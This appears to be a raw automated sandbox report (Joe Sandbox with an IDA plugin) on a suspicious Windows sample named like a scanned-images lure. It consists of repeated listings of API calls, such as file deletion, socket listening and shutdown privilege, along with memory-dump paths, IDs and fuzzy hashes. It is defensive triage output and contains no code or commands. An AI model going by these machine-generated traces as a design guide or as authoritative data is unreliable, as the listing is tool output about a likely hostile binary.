                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004C6A75
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004C6AB2
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004C6ADF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                • API String ID: 3830820486-3289030164
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 004C9663
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004C96A1
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 004C96BB
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004C96D3
                                                                                • FindClose.KERNEL32(00000000), ref: 004C96DE
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 004C96FA
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C974A
                                                                                • SetCurrentDirectoryW.KERNEL32(00516B7C), ref: 004C9768
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C9772
                                                                                • FindClose.KERNEL32(00000000), ref: 004C977F
                                                                                • FindClose.KERNEL32(00000000), ref: 004C978F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1409584000-438819550
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 004C97BE
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004C9819
                                                                                • FindClose.KERNEL32(00000000), ref: 004C9824
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 004C9840
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C9890
                                                                                • SetCurrentDirectoryW.KERNEL32(00516B7C), ref: 004C98AE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C98B8
                                                                                • FindClose.KERNEL32(00000000), ref: 004C98C5
                                                                                • FindClose.KERNEL32(00000000), ref: 004C98D5
                                                                                  • Part of subcall function 004BDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004BDB00
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 2640511053-438819550
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 004C8257
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004C8267
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004C8273
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C8310
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C8324
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C8356
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004C838C
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C8395
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                • String ID: *.*
                                                                                • API String ID: 1464919966-438819550
                                                                                APIs
                                                                                  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
                                                                                  • Part of subcall function 004BE199: GetFileAttributesW.KERNEL32(?,004BCF95), ref: 004BE19A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004BD122
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004BD1DD
                                                                                • MoveFileW.KERNEL32(?,?), ref: 004BD1F0
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 004BD20D
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004BD237
                                                                                  • Part of subcall function 004BD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004BD21C,?,?), ref: 004BD2B2
                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 004BD253
                                                                                • FindClose.KERNEL32(00000000), ref: 004BD264
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 1946585618-1173974218
                                                                                • Opcode ID: 7105d1315b6f9b71f79a15071610cd7a81bcc2035eb7fb4b6682536ec7614e2b
                                                                                • Instruction ID: 3e122dfedb31334ef68147101656a71b0f0b9b09b716c92871cef17196c734df
                                                                                • Opcode Fuzzy Hash: 7105d1315b6f9b71f79a15071610cd7a81bcc2035eb7fb4b6682536ec7614e2b
                                                                                • Instruction Fuzzy Hash: 39618F31C0114DABCF05EBE1C9929EEB7B5AF14349F2445AAE80177192EB385F09CB69
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 059725b64950bf021acdca1b536b90dd46f8b684641803bf3f0c54e36c2b2fc3
                                                                                • Instruction ID: d1346c0e0acd8338594eab01eeccdd8b9ba67261ac9c6b35e22311df28789b76
                                                                                • Opcode Fuzzy Hash: 059725b64950bf021acdca1b536b90dd46f8b684641803bf3f0c54e36c2b2fc3
                                                                                • Instruction Fuzzy Hash: 6141AF356046519FD720DF26D888F1ABBA1EF44358F14C0AEE8168F762C739EC42CB98
                                                                                APIs
                                                                                  • Part of subcall function 004B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B170D
                                                                                  • Part of subcall function 004B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B173A
                                                                                  • Part of subcall function 004B16C3: GetLastError.KERNEL32 ref: 004B174A
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 004BE932
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-3163812486
                                                                                • Opcode ID: a48248148d6e9c16577045fd73f6d6d86b56b81a45c31634856517656fb3deeb
                                                                                • Instruction ID: b4beff9fbbc8cd6841ef76631241402f34a9831dabd9342a5a74fa07c82e3b1b
                                                                                • Opcode Fuzzy Hash: a48248148d6e9c16577045fd73f6d6d86b56b81a45c31634856517656fb3deeb
                                                                                • Instruction Fuzzy Hash: 2101F2B2610210EFEB1826B69CC6BFB729CA744744F140823F812E21E2D5A85C4982BC
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004D1276
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1283
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 004D12BA
                                                                                • WSAGetLastError.WSOCK32 ref: 004D12C5
                                                                                • closesocket.WSOCK32(00000000), ref: 004D12F4
                                                                                • listen.WSOCK32(00000000,00000005), ref: 004D1303
                                                                                • WSAGetLastError.WSOCK32 ref: 004D130D
                                                                                • closesocket.WSOCK32(00000000), ref: 004D133C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                • String ID:
                                                                                • API String ID: 540024437-0
                                                                                • Opcode ID: 786129bf9f6506b58d3906e5842413769ab6c311ae6ee4b62470894708045bf1
                                                                                • Instruction ID: a3915bad7cf9833c258eb960c62c1bc0afff38cbc6c6ff8785776dfca34f0dc6
                                                                                • Opcode Fuzzy Hash: 786129bf9f6506b58d3906e5842413769ab6c311ae6ee4b62470894708045bf1
                                                                                • Instruction Fuzzy Hash: 82418F31600140AFD714DF64C5D8A2AB7E5AB46318F18819ADC569F3A3C735EC86CBA5
                                                                                APIs
                                                                                  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
                                                                                  • Part of subcall function 004BE199: GetFileAttributesW.KERNEL32(?,004BCF95), ref: 004BE19A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004BD420
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 004BD470
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004BD481
                                                                                • FindClose.KERNEL32(00000000), ref: 004BD498
                                                                                • FindClose.KERNEL32(00000000), ref: 004BD4A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 2649000838-1173974218
                                                                                • Opcode ID: 8c4fc92259796b046bc49d22e4ec9385a3124887679fb174d80b39d8cbb4ba78
                                                                                • Instruction ID: d5987a9379fa5960cb842f7100376f2716bdd8c533847bdad5d5cb8dcf0319d1
                                                                                • Opcode Fuzzy Hash: 8c4fc92259796b046bc49d22e4ec9385a3124887679fb174d80b39d8cbb4ba78
                                                                                • Instruction Fuzzy Hash: D23170714083859BC300EF65C8918EF77E8AE91355F444E6EF8D153192EB38AA0EC76B
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: __floor_pentium4
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 4168288129-2761157908
                                                                                • Opcode ID: d1ba7cd62918483682d09dfabc59e96375a026ddc4cd2884dd434d88e276674c
                                                                                • Instruction ID: 815fb4e7633b8cca60b4f2264874134f13a2b7c65984eb99243734d0433edc06
                                                                                • Opcode Fuzzy Hash: d1ba7cd62918483682d09dfabc59e96375a026ddc4cd2884dd434d88e276674c
                                                                                • Instruction Fuzzy Hash: 56C25971E086288FDB25EE298D407EEB7B5EB49304F1445EBD80DE7241E778AE858F44
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004C64DC
                                                                                • CoInitialize.OLE32(00000000), ref: 004C6639
                                                                                • CoCreateInstance.OLE32(004EFCF8,00000000,00000001,004EFB68,?), ref: 004C6650
                                                                                • CoUninitialize.OLE32 ref: 004C68D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                • String ID: .lnk
                                                                                • API String ID: 886957087-24824748
                                                                                • Opcode ID: 3618ef24df7f27b3ae591ec9c02dc6785b385368b5678201b266cdc5421f0dec
                                                                                • Instruction ID: 9f877de162f785338e9c69d8b1e00bdd33e72ef4ea7e949d772b20c08f8e3d82
                                                                                • Opcode Fuzzy Hash: 3618ef24df7f27b3ae591ec9c02dc6785b385368b5678201b266cdc5421f0dec
                                                                                • Instruction Fuzzy Hash: 40D15971508201AFC304EF25D881E6BB7E8FF94709F10896EF5958B292DB34ED09CB96
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 004D22E8
                                                                                  • Part of subcall function 004CE4EC: GetWindowRect.USER32(?,?), ref: 004CE504
                                                                                • GetDesktopWindow.USER32 ref: 004D2312
                                                                                • GetWindowRect.USER32(00000000), ref: 004D2319
                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 004D2355
                                                                                • GetCursorPos.USER32(?), ref: 004D2381
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004D23DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                • String ID:
                                                                                • API String ID: 2387181109-0
                                                                                • Opcode ID: a1c4eb75bdb8e2d49fd739a529a799ceaf89dc15c342c243ca8a6f7dddf81cd6
                                                                                • Instruction ID: e6881f73ec7408a9e2c7c14fb214e33c02f5fce132b3aa562c0e36488d0006c8
                                                                                • Opcode Fuzzy Hash: a1c4eb75bdb8e2d49fd739a529a799ceaf89dc15c342c243ca8a6f7dddf81cd6
                                                                                • Instruction Fuzzy Hash: AB310272504355AFC720DF25C884F9BB7A9FF84314F00091EF8849B281DB78EA09CB9A
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 004C9B78
                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004C9C8B
                                                                                  • Part of subcall function 004C3874: GetInputState.USER32 ref: 004C38CB
                                                                                  • Part of subcall function 004C3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004C3966
                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 004C9BA8
                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004C9C75
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                • String ID: *.*
                                                                                • API String ID: 1972594611-438819550
                                                                                • Opcode ID: 935404e2a7e6e4db83a18bd99e439a6ca6695b4228184b5f3dd25660738352ed
                                                                                • Instruction ID: 1f058b6455b111dd0a328d3bca25fff00b1735fde9d7dae1869dada64c36e7ce
                                                                                • Opcode Fuzzy Hash: 935404e2a7e6e4db83a18bd99e439a6ca6695b4228184b5f3dd25660738352ed
                                                                                • Instruction Fuzzy Hash: 6B418F7590020AAFDF54DF65C889FEE7BB4FF05305F20405AE805A6292EB349E45CF69
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00469A4E
                                                                                • GetSysColor.USER32(0000000F), ref: 00469B23
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00469B36
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Color$LongProcWindow
                                                                                • String ID:
                                                                                • API String ID: 3131106179-0
                                                                                • Opcode ID: fda0c397a84fd6492c0a41f17c4a0787b58092da558911d99bd325ab6eb0c796
                                                                                • Instruction ID: 1f000331fa9d12f98963a93040c2b4222866c70dc036a97788bb46c7a1893cb8
                                                                                • Opcode Fuzzy Hash: fda0c397a84fd6492c0a41f17c4a0787b58092da558911d99bd325ab6eb0c796
                                                                                • Instruction Fuzzy Hash: A6A117B0108580BEE7349A6D8C88E7B269DEB63314B14011BF502C67D1EABDAD06D67F
                                                                                APIs
                                                                                  • Part of subcall function 004D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004D307A
                                                                                  • Part of subcall function 004D304E: _wcslen.LIBCMT ref: 004D309B
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004D185D
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1884
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 004D18DB
                                                                                • WSAGetLastError.WSOCK32 ref: 004D18E6
                                                                                • closesocket.WSOCK32(00000000), ref: 004D1915
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 1601658205-0
                                                                                • Opcode ID: a6a89a9df82c376a510829b38e5e6464c453593a51c3b0c01c817d5c0798d2b2
                                                                                • Instruction ID: c504b71af215019a84f39de83c8f925bd485388370e650010a5ee8bdae8234e5
                                                                                • Opcode Fuzzy Hash: a6a89a9df82c376a510829b38e5e6464c453593a51c3b0c01c817d5c0798d2b2
                                                                                • Instruction Fuzzy Hash: 96518071A00200AFDB10AF25C896F2A77A5AB44718F44809EFD455F3D3D679AD42CBA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: 6424ae258a04788f034aa8de83e32221e61845cf141ed7e5d7fb009088df6048
                                                                                • Instruction ID: 22b387c9d6a35847c6419ecce0f7cafe4c4c2f14fdeda35485754a39762d0f1d
                                                                                • Opcode Fuzzy Hash: 6424ae258a04788f034aa8de83e32221e61845cf141ed7e5d7fb009088df6048
                                                                                • Instruction Fuzzy Hash: 732196317802915FD7208F27D884F677B95EF95316B29806EE845CB362C779EC42CB98
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
